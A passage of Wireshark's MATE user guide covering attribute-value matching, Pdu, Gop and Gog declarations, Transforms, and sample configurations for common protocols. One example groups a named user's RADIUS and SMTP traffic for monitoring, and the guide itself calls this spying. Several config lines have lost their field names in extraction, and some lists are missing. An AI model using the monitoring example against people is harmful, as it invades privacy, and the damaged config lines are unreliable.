well. There are various ways AVPs can be matched against each other using those operators. AVPs are grouped into AVP Lists (AVPLs). PDUs, Gops and Gogs have an AVPL each. Their AVPLs will be matched in various ways against others coming from the configuration file. MATE will be instructed how to extract AVPs from frames in order to create a PDU with an AVPL. It will be instructed as well, how to match that AVPL against the AVPLs of other similar PDUs in order to relate them. In MATE the relationship between PDUs is a Gop, it has an AVPL as well. MATE will be configured with other AVPLs to operate against the Gop’s AVPL to relate Gops together into Gogs. A good understanding on how AVPs and AVPLs work is fundamental to understand how MATE works. Information used by MATE to relate different frames is contained in Attribute/ Value Pairs (AVPs). AVPs are made of two strings - the name and the value. When AVPs are used in the configuration, an operator is defined as well. There are various ways AVPs can be matched against each other using those operators. avp_name="avp's value" another_name= "1234 is the value" The name is a string used to refer to a "kind" of an AVP. Two AVPs won’t match unless their names are identical. You should not use uppercase characters in names, or names that start with “.” or “_”. Capitalized names are reserved for configuration parameters (we’ll call them keywords); nothing forbids you from using capitalized strings for other things as well but it probably would be confusing. I’ll avoid using capitalized words for anything but the keywords in this document, the reference manual, the examples and the base library. Names that start with a “.” would be very confusing as well because in the old grammar, AVPL transformations use names starting with a “.” to indicate they belong to the replacement AVPL. The value is a string that is either set in the configuration (for configuration AVPs) or by Wireshark while extracting interesting fields from a frame’s tree. The values extracted from fields use the same representation as they do in filter strings except that no quotes are used. The name can contain only alphanumeric characters, "_", and ".". The name ends with an operator. The value will be dealt with as a string even if it is a number. If there are any spaces in the value, the value must be between quotes "". ip_addr=10.10.10.11, tcp_port=1234, binary_data=01:23:45:67:89:ab:cd:ef, parameter12=0x23aa, parameter_with_spaces="this value has spaces" The way two AVPs with the same name might match is described by the operator. Remember two AVPs won’t match unless their names are identical. In MATE, match operations are always made between the AVPs extracted from frames (called data AVPs) and the configuration’s AVPs. Currently defined MATE’s AVP match operators are: An AVPL is a set of diverse AVPs that can be matched against other AVPLs. Every PDU, Gop and Gog has an AVPL that contains the information regarding it. The rules that MATE uses to group Pdus and Gops are AVPL operations. There will never be two identical AVPs in a given AVPL. However, we can have more than one AVP with the same name in an AVPL as long as their values are different. Some AVPL examples: ( addr=10.20.30.40, addr=192.168.0.1, tcp_port=21, tcp_port=32534, user_cmd=PORT, data_port=12344, data_addr=192.168.0.1 ) ( addr=10.20.30.40, addr=192.168.0.1, channel_id=22:23, message_type=Setup, calling_number=1244556673 ) ( addr=10.20.30.40, addr=192.168.0.1, ses_id=01:23:45:67:89:ab:cd:ef ) ( user_id=pippo, calling_number=1244556673, assigned_ip=10.23.22.123 ) In MATE there are two types of AVPLs: Data AVPLs can be operated against operation AVPLs in various ways: MATE’s analysis of a frame is performed in three phases: The extraction and matching logic comes from MATE’s configuration; MATE’s configuration file is declared by the mate.config preference. By default it is an empty string which means: do not configure MATE. The config file tells MATE what to look for in frames; How to make PDUs out of it; How will PDUs be related to other similar PDUs into Gops; And how Gops relate into Gogs. The MATE configuration file is a list of declarations. There are 4 types of declarations: Transform, Pdu, Gop and Gog. MATE will look in the tree of every frame to see if there is useful data to extract, and if there is, it will create one or more PDU objects containing the useful information. The first part of MATE’s analysis is the "PDU extraction"; there are various "Actions" that are used to instruct MATE what has to be extracted from the current frame’s tree into MATE’s PDUs. MATE will make a Pdu for each different proto field of Proto type present in the frame. MATE will fetch from the field’s tree those fields that are defined in the Section 12.8.1, “Pdsu’s configuration actions” declaration whose initial offset in the frame is within the boundaries of the current Proto and those of the given Transport and Payload statements. Pdu dns_pdu Proto dns Transport ip { Extract addr From ip.addr; Extract dns_id From dns.id; Extract dns_resp From dns.flags.response; }; MATE will make a Pdu for each different proto field of Proto type present in the frame. MATE will fetch from the field’s tree those fields that are defined in the Section 12.8.1, “Pdsu’s configuration actions” AVPL whose initial offset in the frame is within the boundaries of the current Proto and those of the various assigned Transports. Once MATE has found a Proto field for which to create a Pdu from the frame it will move backwards in the frame looking for the respective Transport fields. After that it will create AVPs named as each of those given in the rest of the AVPL for every instance of the fields declared as its values. Sometimes we need information from more than one Transport protocol. In that case MATE will check the frame looking backwards to look for the various Transport protocols in the given stack. MATE will choose only the closest transport boundary per "protocol" in the frame. This way we’ll have all Pdus for every Proto that appears in a frame match its relative transports. Pdu isup_pdu Proto isup Transport mtp3/ip { Extract m3pc From mtp3.dpc; Extract m3pc From mtp3.opc; Extract cic From isup.cic; Extract addr From ip.addr; Extract isup_msg From isup.message_type; }; This allows to assign the right Transport to the Pdu avoiding duplicate transport protocol entries (in case of tunneled ip over ip for example). Pdu ftp_pdu Proto ftp Transport tcp/ip { Extract addr From ip.addr; Extract port From tcp.port; Extract ftp_cmd From; }; Other than the mandatory Transport there is also an optional Payload statement, which works pretty much as Transport but refers to elements after the Proto's range. It is useful in those cases where the payload protocol might not appear in a Pdu but nevertheless the Pdu belongs to the same category. Pdu mmse_over_http_pdu Proto http Transport tcp/ip { Payload mmse; Extract addr From ip.addr; Extract port From tcp.port; Extract method From http.request.method; Extract content From http.content_type; Extract http_rq From http.request; Extract resp From http.response.code; Extract host From http.host; Extract trx From mmse.transaction_id; Extract msg_type From mmse.message_type; Extract notify_status From mmse.status; Extract send_status From mmse.response_status; }; There might be cases in which we won’t want MATE to create a PDU unless some of its extracted attributes meet or do not meet some criteria. For that we use the Criteria statements of the Pdu declarations. Pdu isup_pdu Proto isup Transport mtp3/ip { ... // MATE will create isup_pdu PDUs only when there is not a point code '1234' Criteria Reject Strict (m3pc=1234); }; Pdu ftp_pdu Proto ftp Transport tcp/ip { ... // MATE will create ftp_pdu PDUs only when they go to port 21 of our ftp_server Criteria Accept Strict (addr=10.10.10.10, port=21); }; The Criteria statement is given an action (Accept or Reject), a match mode (Strict, Loose or Every) and an AVPL against which to match the currently extracted one. Once the fields have been extracted into the Pdu’s AVPL, MATE will apply any declared transformation to it. The way transforms are applied and how they work is described later on. However it’s useful to know that once the AVPL for the Pdu is created, it may be transformed before being analyzed. That way we can massage the data to simplify the analysis. Every successfully created Pdu will add a MATE tree to the frame dissection. If the Pdu is not related to any Gop, the tree for the Pdu will contain just the Pdu’s info, if it is assigned to a Gop, the tree will also contain the Gop items, and the same applies for the Gog level. mate dns_pdu:1 dns_pdu: 1 dns_pdu time: 3.750000 dns_pdu Attributes dns_resp: 0 dns_id: 36012 addr: 10.194.4.11 addr: 10.194.24.35 The Pdu’s tree contains some filterable fields the tree will contain the various attributes of the Pdu as well, these will all be strings (to be used in filters as "10.0.0.1", not as 10.0.0.1) Once MATE has created the Pdus it passes to the Pdu analysis phase. During the PDU analysis phase MATE will try to group Pdus of the same type into 'Groups of Pdus' (aka *Gop*s) and copy some AVPs from the Pdu’s AVPL to the Gop’s AVPL. Given a Pdu, the first thing MATE will do is to check if there is any Gop declaration in the configuration for the given Pdu type. If so, it will use its Match AVPL to match it against the Pdu’s AVPL; if they don’t match, the analysis phase is done. If there is a match, the AVPL is the Gop’s candidate key which will be used to search the Gop’s index for the Gop to which to assign the current PDU. If there is no such Gop and this Pdu does not match the Start criteria of a Gop declaration for the Pdu type, the Pdu will remain unassigned and only the analysis phase will be done. Gop ftp_ses On ftp_pdu Match (addr, addr, port, port); Gop dns_req On dns_pdu Match (addr, addr, dns_id); Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic); If there was a match, the candidate key will be used to search the Gop’s index to see if there is already a Gop matching the Gop’s key the same way. If there is such a match in the Gops collection, and the PDU doesn’t match the Start AVPL for its kind, the PDU will be assigned to the matching Gop. If it is a Start match, MATE will check whether or not that Gop has been already stopped. If the Gop has been stopped, a new Gop will be created and will replace the old one in the Gop’s index. Gop ftp_ses On ftp_pdu Match (addr, addr, port, port) { Start (ftp_cmd=USER); }; Gop dns_req On dns_pdu Match (addr, addr, dns_id) { Start (dns_resp=0); }; Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic) { Start (isup_msg=1); }; If no Start is given for a Gop, a Pdu whose AVPL matches an existing Gog’s key will act as the start of a Gop. Once we know a Gop exists and the Pdu has been assigned to it, MATE will copy into the Gop’s AVPL all the attributes matching the key plus any AVPs of the Pdu’s AVPL matching the Extra AVPL. Gop ftp_ses On ftp_pdu Match (addr, addr, port, port) { Start (ftp_cmd=USER); Extra (pasv_prt, pasv_addr); }; Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic) { Start (isup_msg=1); Extra (calling, called); }; Once the Pdu has been assigned to the Gop, MATE will check whether or not the Pdu matches the Stop, if it happens, MATE will mark the Gop as stopped. Even after stopped, a Gop may get assigned new Pdus matching its key, unless such Pdu matches Start. If it does, MATE will instead create a new Gop starting with that Pdu. Gop ftp_ses On ftp_pdu Match (addr, addr, port, port) { Start (ftp_cmd=USER); Stop (ftp_cmd=QUIT); // The response to the QUIT command will be assigned to the same Gop Extra (pasv_prt, pasv_addr); }; Gop dns_req On dns_pdu Match (addr, addr, dns_id) { Start (dns_resp=0); Stop (dns_resp=1); }; Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic) { Start (isup_msg=1); // IAM Stop (isup_msg=16); // RLC Extra (calling, called); }; If no Stop criterium is stated for a given Gop, the Gop will be stopped as soon as it is created. However, as with any other Gop, Pdus matching the Gop’s key will still be assigned to the Gop unless they match a Start condition, in which case a new Gop using the same key will be created. For every frame containing a Pdu that belongs to a Gop, MATE will create a tree for that Gop. The example below represents the tree created by the dns_pdu and dns_req examples. ... mate dns_pdu:6->dns_req:1 dns_pdu: 6 dns_pdu time: 2.103063 dns_pdu time since beginning of Gop: 2.103063 dns_req: 1 dns_req Attributes dns_id: 36012 addr: 10.194.4.11 addr: 10.194.24.35 dns_req Times dns_req start time: 0.000000 dns_req hold time: 2.103063 dns_req duration: 2.103063 dns_req number of PDUs: 2 Start PDU: in frame 1 Stop PDU: in frame 6 (2.103063 : 2.103063) dns_pdu Attributes dns_resp: 1 dns_id: 36012 addr: 10.194.4.11 addr: 10.194.24.35 Other than the pdu’s tree, this one contains information regarding the relationship between the Pdus that belong to the Gop. That way we have: the timers of the Gop mate.dns_req.NumOfPdus the number of Pdus that belong to this Gop Note that there are two "timers" for a Gop: So: When Gops are created, or whenever their AVPL changes, Gops are (re)analyzed to check if they match an existent group of groups (Gog) or can create a new one. The Gop analysis is divided into two phases. In the first phase, the still unassigned Gop is checked to verify whether it belongs to an already existing Gog or may create a new one. The second phase eventually checks the Gog and registers its keys in the Gogs index. There are several reasons for the author to believe that this feature needs to be reimplemented, so probably there will be deep changes in the way this is done in the near future. This section of the documentation reflects the version of MATE as of Wireshark 0.10.9; in future releases this will change. The first thing we have to do configuring a Gog is to tell MATE that it exists. Gog web_use { ... }; Then we have to tell MATE what to look for a match in the candidate Gops. Gog web_use { Member http_ses (host); Member dns_req (host); }; Most often, also other attributes than those used for matching would be interesting. In order to copy from Gop to Gog other interesting attributes, we might use Extra like we do for Gops. Gog web_use { ... Extra (cookie); }; mate http_pdu:4->http_req:2->http_use:1 http_pdu: 4 http_pdu time: 1.309847 http_pdu time since beginning of Gop: 0.218930 http_req: 2 ... (the gop's tree for http_req: 2) .. http_use: 1 http_use Attributes host: http_use Times http_use start time: 0.000000 http_use duration: 1.309847 number of GOPs: 3 dns_req: 1 ... (the gop's tree for dns_req: 1) .. http_req: 1 ... (the gop's tree for http_req: 1) .. http_req of current frame: 2 We can filter on: the attributes passed to the Gog A Transform is a sequence of Match rules optionally completed with modification of the match result by an additional AVPL. Such modification may be an Insert (merge) or a Replace. Transforms can be used as helpers to manipulate an item’s AVPL before it is processed further. They come to be very helpful in several cases. AVPL Transformations are declared in the following way: Transform name { Match [Strict|Every|Loose] match_avpl [Insert|Replace] modify_avpl ; ... }; The name is the handle to the AVPL transformation. It is used to refer to the transform when invoking it later. The Match declarations instruct MATE what and how to match against the data AVPL and how to modify the data AVPL if the match succeeds. They will be executed in the order they appear in the config file whenever they are invoked. The optional match mode qualifier (Strict, Every, or Loose) is used to choose the match mode as explained above; Strict is a default value which may be omitted. The optional modification mode qualifier instructs MATE how the modify AVPL should be used: The modify_avpl may be an empty one; this comes useful in some cases for both Insert and Replace modification modes. Examples: Transform insert_name_and { Match Strict (host=10.10.10.10, port=2345) Insert (name=JohnDoe); }; adds name=JohnDoe to the data AVPL if it contains host=10.10.10.10 and port=2345 Transform insert_name_or { Match Loose (host=10.10.10.10, port=2345) Insert (name=JohnDoe); }; adds name=JohnDoe to the data AVPL if it contains host=10.10.10.10 or port=2345 Transform replace_ip_address { Match (host=10.10.10.10) Replace (host=192.168.10.10); }; replaces the original host=10.10.10.10 by host=192.168.10.10 Transform add_ip_address { Match (host=10.10.10.10) (host=192.168.10.10); }; adds (inserts) host=192.168.10.10 to the AVPL, keeping the original host=10.10.10.10 in it too Transform replace_may_be_surprising { Match Loose (a=aaaa, b=bbbb) Replace (c=cccc, d=dddd); }; gives the following results: Once declared, Transforms can be added to the declarations of PDUs, Gops or Gogs. This is done by adding the Transform name_list statement to the declaration: Pdu my_proto_pdu Proto my_proto Transport ip { Extract addr From ip.addr; ... Transform my_pdu_transform[, other_pdu_transform[, yet_another_pdu_transform]]; }; MATE’s Transforms can be used for many different things, like: Using Transforms we can add more than one start or stop condition to a Gop. Transform start_cond { Match (attr1=aaa,attr2=bbb) (msg_type=start); Match (attr3=www,attr2=bbb) (msg_type=start); Match (attr5^a) (msg_type=stop); Match (attr6$z) (msg_type=stop); }; Pdu pdu ... { ... Transform start_cond; } Gop gop ... { Start (msg_type=start); Stop (msg_type=stop); ... } Transform marks { Match (addr=10.10.10.10, user=john) (john_at_host); Match (addr=10.10.10.10, user=tom) (tom_at_host); } ... Gop my_gop ... { ... Transform marks; } After that we can use a display filter mate.gop.john_at_host or mate.gop.tom_at_host Transform direction_as_text { Match (src=192.168.0.2, dst=192.168.0.3) Replace (direction=from_2_to_3); Match (src=192.168.0.3, dst=192.168.0.2) Replace (direction=from_3_to_2); }; Pdu my_pdu Proto my_proto Transport tcp/ip { Extract src From ip.src; Extract dst From ip.dst; Extract addr From ip.addr; Extract port From tcp.port; Extract start From tcp.flags.syn; Extract stop From tcp.flags.fin; Extract stop From tcp.flags.rst; Transform direction_as_text; } Gop my_gop On my_pdu Match (addr,addr,port,port) { ... Extra (direction); } NAT can create problems when tracing, but we can easily worked around it by Transforming the NATed IP address and the Ethernet address of the router into the non-NAT address: Transform denat { Match (addr=192.168.0.5, ether=01:02:03:04:05:06) Replace (addr=123.45.67.89); Match (addr=192.168.0.6, ether=01:02:03:04:05:06) Replace (addr=123.45.67.90); Match (addr=192.168.0.7, ether=01:02:03:04:05:06) Replace (addr=123.45.67.91); } Pdu my_pdu Proto my_proto transport tcp/ip/eth { Extract ether From eth.addr; Extract addr From ip.addr; Extract port From tcp.port; Transform denat; } MATE was originally written by Luis Ontanon, a Telecommunications systems troubleshooter, as a way to save time filtering out the packets of a single call from huge capture files using just the calling number. Later he used the time he had saved to make it flexible enough to work with protocols other than the ones he was directly involved with.: The complete config file is available on the Wireshark Wiki: Note: for this example I used dns.qry.name which is defined since Wireshark version 0.10.9. Supposing you have a mate plugin already installed you can test it with the current Wireshark version.*s with the same *host belong to the same Gog, same thing for *dns_req*s. So far we have instructed mate to group every packet related to sessions towards a certain host. At this point if we open a capture file and: Transform_s, _Transform_s are cumbersome, but they are very useful.. The following is a collection of various configuration examples for MATE. Many of them are useless because the "conversations" facility does a better job. Anyway they are meant to help users understanding how to configure MATE. The following example creates a GoP out of every TCP session. Pdu tcp_pdu Proto tcp Transport ip { Extract addr From ip.addr; Extract port From tcp.port; Extract tcp_start From tcp.flags.syn; Extract tcp_stop From tcp.flags.reset; Extract tcp_stop From tcp.flags.fin; }; Gop tcp_ses On tcp_pdu Match (addr, addr, port, port) { Start (tcp_start=1); Stop (tcp_stop=1); }; Done; This probably would do fine in 99.9% of the cases but 10.0.0.1:20→10.0.0.2:22 and 10.0.0.1:22→10.0.0.2:20 would both fall into the same gop if they happen to overlap in time. This configuration allows to tie a complete passive ftp session (including the data transfer) in a single Gog. Pdu ftp_pdu Proto ftp Transport tcp/ip { Extract ftp_addr From ip.addr; Extract ftp_port From tcp.port; Extract ftp_resp From; Extract ftp_req From; Extract server_addr From; Extract server_port From; LastPdu; }; Pdu ftp_data_pdu Proto ftp-data Transport tcp/ip{ Extract server_addr From ip.src; Extract server_port From tcp.srcport; }; Gop ftp_data On ftp_data_pdu (server_addr, server_port) { Start (server_addr); }; Gop ftp_ctl On ftp_pdu (ftp_addr, ftp_addr, ftp_port, ftp_port) { Start (ftp_resp=220); Stop (ftp_resp=221); Extra (server_addr, server_port); }; Gog ftp_ses { Member ftp_ctl (ftp_addr, ftp_addr, ftp_port, ftp_port); Member ftp_data (server_addr, server_port); }; Done; Note: not having anything to distinguish between ftp-data packets makes this config to create one Gop for every ftp-data packet instead of each transfer. Pre-started Gops would avoid this. Spying on people, in addition to being immoral, is illegal in many countries. This is an example meant to explain how to do it not an invitation to do so. It’s up to the police to do this kind of job when there is a good reason to do so. Pdu radius_pdu On radius Transport udp/ip { Extract addr From ip.addr; Extract port From udp.port; Extract radius_id From radius.id; Extract radius_code From radius.code; Extract user_ip From radius.framed_addr; Extract username From radius.username; } Gop radius_req On radius_pdu (radius_id, addr, addr, port, port) { Start (radius_code {1|4|7} ); Stop (radius_code {2|3|5|8|9} ); Extra (user_ip, username); } // we define the smtp traffic we want to filter Pdu user_smtp Proto smtp Transport tcp/ip { Extract user_ip From ip.addr; Extract smtp_port From tcp.port; Extract tcp_start From tcp.flags.syn; Extract tcp_stop From tcp.flags.reset; } Gop user_smtp_ses On user_smtp (user_ip, user_ip, smtp_port!25) { Start (tcp_start=1); Stop (tcp_stop=1); } // with the following group of groups we'll group together the radius and the smtp // we set a long expiration to avoid the session expire on long pauses. Gog user_mail { Expiration 1800; Member radius_req (user_ip); Member user_smtp_ses (user_ip); Extra (username); } Done; Filtering the capture file with mate.user_mail.username == "theuser" will filter the radius packets and smtp traffic for "theuser". This configuration will create a Gog out of every call. Pdu q931 Proto q931 Transport ip { Extract addr From ip.addr; Extract call_ref From q931.call_ref; Extract q931_msg From q931.message_type; Extract calling From q931.calling_party_number.digits; Extract called From q931.called_party_number.digits; Extract guid From h225.guid; Extract q931_cause From q931.cause_value; }; Gop q931_leg On q931 Match (addr, addr, call_ref) { Start (q931_msg=5); Stop (q931_msg=90); Extra (calling, called, guid, q931_cause); }; Pdu ras Proto h225.RasMessage Transport ip { Extract addr From ip.addr; Extract ras_sn From h225.requestSeqNum; Extract ras_msg From h225.RasMessage; Extract guid From h225.guid; }; Gop ras_req On ras Match (addr, addr, ras_sn) { Start (ras_msg {0|3|6|9|12|15|18|21|26|30} ); Stop (ras_msg {1|2|4|5|7|8|10|11|13|14|16|17|19|20|22|24|27|28|29|31}); Extra (guid); }; Gog call { Member ras_req (guid); Member q931_leg (guid); Extra (called,calling,q931_cause); }; Done; with this we can: With this example, all the components of an MMS send or receive will be tied into a single Gog. Note that this example uses the Payload clause because MMS delivery uses MMSE over either HTTP or WSP. As it is not possible to relate the retrieve request to a response by the means of MMSE only (the request is just an HTTP GET without any MMSE), a Gop is made of HTTP Pdus but MMSE data need to be extracted from the bodies. ## WARNING: this example has been blindly translated from the "old" MATE syntax ## and it has been verified that Wireshark accepts it. However, it has not been ## tested against any capture file due to lack of the latter. Transform rm_client_from_http_resp1 { Match (http_rq); Match Every (addr) Insert (not_rq); }; Transform rm_client_from_http_resp2 { Match (not_rq,ue) Replace (); }; Pdu mmse_over_http_pdu Proto http Transport tcp/ip { Payload mmse; Extract addr From ip.addr; Extract port From tcp.port; Extract http_rq From http.request; Extract content From http.content_type; Extract resp From http.response.code; Extract method From http.request.method; Extract host From http.host; Extract content From http.content_type; Extract trx From mmse.transaction_id; Extract msg_type From mmse.message_type; Extract notify_status From mmse.status; Extract send_status From mmse.response_status; Transform rm_client_from_http_resp1, rm_client_from_http_resp2; }; Gop mmse_over_http On mmse_over_http_pdu Match (addr, addr, port, port) { Start (http_rq); Stop (http_rs); Extra (host, ue, resp, notify_status, send_status, trx); }; Transform mms_start { Match Loose() Insert (mms_start); }; Pdu mmse_over_wsp_pdu Proto wsp Transport ip { Payload mmse; Extract trx From mmse.transaction_id; Extract msg_type From mmse.message_type; Extract notify_status From mmse.status; Extract send_status From mmse.response_status; Transform mms_start; }; Gop mmse_over_wsp On mmse_over_wsp_pdu Match (trx) { Start (mms_start); Stop (never); Extra (ue, notify_status, send_status); }; Gog mms { Member mmse_over_http (trx); Member mmse_over_wsp (trx); Extra (ue, notify_status, send_status, resp, host, trx); Expiration 60.0; }; The MATE library (will) contains GoP definitions for several protocols. Library protocols are included in your MATE config using: _Action=Include; Lib=proto_name;_. For Every protocol with a library entry, we’ll find defined what from the PDU is needed to create a GoP for that protocol, eventually any criteria and the very essential GoP definition (i.e. GopDef, GopStart and GopStop). It will create a GoP for every TCP session, If it is used it should be the last one in the list. And every other proto on top of TCP should be declared with Stop=TRUE; so the a TCP PDU is not created where we got already one going on. Action=PduDef; Name=tcp_pdu; Proto=tcp; Transport=ip; addr=ip.addr; port=tcp.port; tcp_start=tcp.flags.syn; tcp_stop=tcp.flags.fin; tcp_stop=tcp.flags.reset; Action=GopDef; Name=tcp_session; On=tcp_pdu; addr; addr; port; port; Action=GopStart; For=tcp_session; tcp_start=1; Action=GopStop; For=tcp_session; tcp_stop=1; will create a GoP containing every request and it’s response (eventually retransmissions too). Action=PduDef; Name=dns_pdu; Proto=dns; Transport=udp/ip; addr=ip.addr; port=udp.port; dns_id=dns.id; dns_rsp=dns.flags.response; Action=GopDef; Name=dns_req; On=dns_pdu; addr; addr; port!53; dns_id; Action=GopStart; For=dns_req; dns_rsp=0; Action=GopStop; For=dns_req; dns_rsp=1; A Gop for every transaction. Action=PduDef; Name=radius_pdu; Proto=radius; Transport=udp/ip; addr=ip.addr; port=udp.port; radius_id=radius.id; radius_code=radius.code; Action=GopDef; Name=radius_req; On=radius_pdu; radius_id; addr; addr; port; port; Action=GopStart; For=radius_req; radius_code|1|4|7; Action=GopStop; For=radius_req; radius_code|2|3|5|8|9; Action=PduDef; Name=rtsp_pdu; Proto=rtsp; Transport=tcp/ip; addr=ip.addr; port=tcp.port; rtsp_method=rtsp.method; Action=PduExtra; For=rtsp_pdu; rtsp_ses=rtsp.session; rtsp_url=rtsp.url; Action=GopDef; Name=rtsp_ses; On=rtsp_pdu; addr; addr; port; port; Action=GopStart; For=rtsp_ses; rtsp_method=DESCRIBE; Action=GopStop; For=rtsp_ses; rtsp_method=TEARDOWN; Action=GopExtra; For=rtsp_ses; rtsp_ses; rtsp_url; Most protocol definitions here will create one Gop for every Call Leg unless stated. Action=PduDef; Name=isup_pdu; Proto=isup; Transport=mtp3; mtp3pc=mtp3.dpc; mtp3pc=mtp3.opc; cic=isup.cic; isup_msg=isup.message_type; Action=GopDef; Name=isup_leg; On=isup_pdu; ShowPduTree=TRUE; mtp3pc; mtp3pc; cic; Action=GopStart; For=isup_leg; isup_msg=1; Action=GopStop; For=isup_leg; isup_msg=16; Action=PduDef; Name=q931_pdu; Proto=q931; Stop=TRUE; Transport=tcp/ip; addr=ip.addr; call_ref=q931.call_ref; q931_msg=q931.message_type; Action=GopDef; Name=q931_leg; On=q931_pdu; addr; addr; call_ref; Action=GopStart; For=q931_leg; q931_msg=5; Action=GopStop; For=q931_leg; q931_msg=90; Action=PduDef; Name=ras_pdu; Proto=h225.RasMessage; Transport=udp/ip; addr=ip.addr; ras_sn=h225.RequestSeqNum; ras_msg=h225.RasMessage; Action=PduExtra; For=ras_pdu; guid=h225.guid; Action=GopDef; Name=ras_leg; On=ras_pdu; addr; addr; ras_sn; Action=GopStart; For=ras_leg; ras_msg|0|3|6|9|12|15|18|21|26|30; Action=GopStop; For=ras_leg; ras_msg|1|2|4|5|7|8|10|11|13|14|16|17|19|20|22|24|27|28|29|31; Action=GopExtra; For=ras_leg; guid; Action=PduDef; Proto=sip_pdu; Transport=tcp/ip; addr=ip.addr; port=tcp.port; sip_method=sip.Method; sip_callid=sip.Call-ID; calling=sdp.owner.username; Action=GopDef; Name=sip_leg; On=sip_pdu; addr; addr; port; port; Action=GopStart; For=sip; sip_method=INVITE; Action=GopStop; For=sip; sip_method=BYE; Will create a Gop out of every transaction. To "tie" them to your call’s GoG use: Action=GogKey; Name=your_call; On=mgc_tr; addr!mgc_addr; megaco_ctx; Action=PduDef; Name=mgc_pdu; Proto=megaco; Transport=ip; addr=ip.addr; megaco_ctx=megaco.context; megaco_trx=megaco.transid; megaco_msg=megaco.transaction; term=megaco.termid; Action=GopDef; Name=mgc_tr; On=mgc_pdu; addr; addr; megaco_trx; Action=GopStart; For=mgc_tr; megaco_msg|Request|Notify; Action=GopStop; For=mgc_tr; megaco_msg=Reply; Action=GopExtra; For=mgc_tr; term^DS1; megaco_ctx!Choose one; MATE uses AVPs for almost everything: to keep the data it has extracted from the frames' trees as well as to keep the elements of the configuration. These "pairs" (actually tuples) are made of a name, a value and, in case of configuration AVPs, an operator. Names and values are strings. AVPs with operators other than '=' are used only in the configuration and are used for matching AVPs of Pdus, GoPs and GoGs in the analysis phase. The name is a string used to refer to a class of AVPs. Two attributes won’t match unless their names are identical. Capitalized names are reserved for keywords (you can use them for your elements if you want but I think it’s not the case). MATE attribute names can be used in Wireshark’s display filters the same way like names of protocol fields provided by dissectors, but they are not just references to (or aliases of) protocol fields. The value is a string. It is either set in the configuration (for configuration AVPs) or by MATE while extracting interesting fields from a dissection tree and/or manipulating them later. The values extracted from fields use the same representation as they do in filter strings. Currently only match operators are defined (there are plans to (re)add transform attributes but some internal issues have to be solved before that). The match operations are always performed between two operands: the value of an AVP stated in the configuration and the value of an AVP (or several AVPs with the same name) extracted from packet data (called "data AVPs"). It is not possible to match data AVPs to each other. The defined match operators are: This operator tests whether the values of the operator and the operand AVP are equal. This operator matches if the value strings of two AVPs are not equal. The "one of" operator matches if the data AVP value is equal to one of the values listed in the "one of" AVP. The "starts with" operator matches if the first characters of the data AVP value are identical to the configuration AVP value. The ends with operator will match if the last bytes of the data AVP value are equal to the configuration AVP value. The "contains" operator will match if the data AVP value contains a string identical to the configuration AVP value. The "lower than" operator will match if the data AVP value is semantically lower than the configuration AVP value. BUGS It should check whether the values are numbers and compare them numerically The "higher than" operator will match if the data AVP value is semantically higher than the configuration AVP value. Examples attrib=bcd matches attrib>abc attrib=3 matches attrib>2 but beware: attrib=9 does not match attrib>10 attrib=abc does not match attrib>bcd attrib=abc does not match attrib>abc BUGS It should check whether the values are numbers and compare them numerically Pdus, GoPs and GoGs use an AVPL to contain the tracing information. An AVPL is an unsorted set of AVPs that can be matched against other AVPLs. There are three types of match operations that can be performed between AVPLs. The Pdu’s/GoP’s/GoG’s AVPL will be always one of the operands; the AVPL operator (match type) and the second operand AVPL will always come from the configuration. Note that a diverse AVP match operator may be specified for each AVP in the configuration AVPL. An AVPL match operation returns a result AVPL. In Transforms, the result AVPL may be replaced by another AVPL. The replacement means that the existing data AVPs are dropped and the replacement AVPL from the configuration is Merged to the data AVPL of the Pdu/GoP/GoG. A loose match between AVPLs succeeds if at least one of the data AVPs matches at least one of the configuration AVPs. Its result AVPL contains all the data AVPs that matched. Loose matches are used in Extra operations against the Pdu's AVPL to merge the result into Gop's AVPL, and against Gop's AVPL to merge the result into Gog's AVPL. They may also be used in Criteria and Transforms. Loose Match Examples (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Loose (attr_a?, attr_c?) =⇒ (attr_a=aaa, attr_c=xxx) (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Loose (attr_a?, attr_c=ccc) =⇒ (attr_a=aaa) (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Loose (attr_a=xxx; attr_c=ccc) =⇒ No Match! An "every" match between AVPLs succeeds if none of the configuration’s AVPs that have a counterpart in the data AVPL fails to match. Its result AVPL contains all the data AVPs that matched. These may only be used in Criteria and Transforms. "Every" Match Examples (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a?, attr_c?) =⇒ (attr_a=aaa, attr_c=xxx) (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a?, attr_c?, attr_d=ddd) =⇒ (attr_a=aaa, attr_c=xxx) (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a?, attr_c=ccc) =⇒ No Match! (attr_a=aaa; attr_b=bbb; attr_c=xxx) Match Every (attr_a=xxx, attr_c=ccc) =⇒ No Match! A Strict match between AVPLs succeeds if and only if every AVP in the configuration AVPL has at least one counterpart in the data AVPL and none of the AVP matches fails. The result AVPL contains all the data AVPs that matched. These are used between Gop keys (key AVPLs) and Pdu AVPLs. They may also be used in Criteria and Transforms. Examples (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Strict (attr_a?, attr_c=xxx) =⇒ (attr_a=aaa, attr_c=xxx) (attr_a=aaa, attr_b=bbb, attr_c=xxx, attr_c=yyy) Match Strict (attr_a?, attr_c?) =⇒ (attr_a=aaa, attr_c=xxx, attr_c=yyy) (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Strict (attr_a?, attr_c=ccc) =⇒ No Match! (attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Strict (attr_a?, attr_c?, attr_d?) =⇒ No Match! An AVPL may be merged into another one. That would add to the latter every AVP from the former that does not already exist there. This operation is done Examples (attr_a=aaa, attr_b=bbb) Merge (attr_a=aaa, attr_c=xxx) former becomes (attr_a=aaa, attr_b=bbb, attr_c=xxx) (attr_a=aaa, attr_b=bbb) Merge (attr_a=aaa, attr_a=xxx) former becomes (attr_a=aaa, attr_a=xxx, attr_b=bbb) (attr_a=aaa, attr_b=bbb) Merge (attr_c=xxx, attr_d=ddd) former becomes (attr_a=aaa, attr_b=bbb, attr_c=xxx, attr_d=ddd) A Transform is a sequence of Match rules optionally followed by an instruction how to modify the match result using an additional 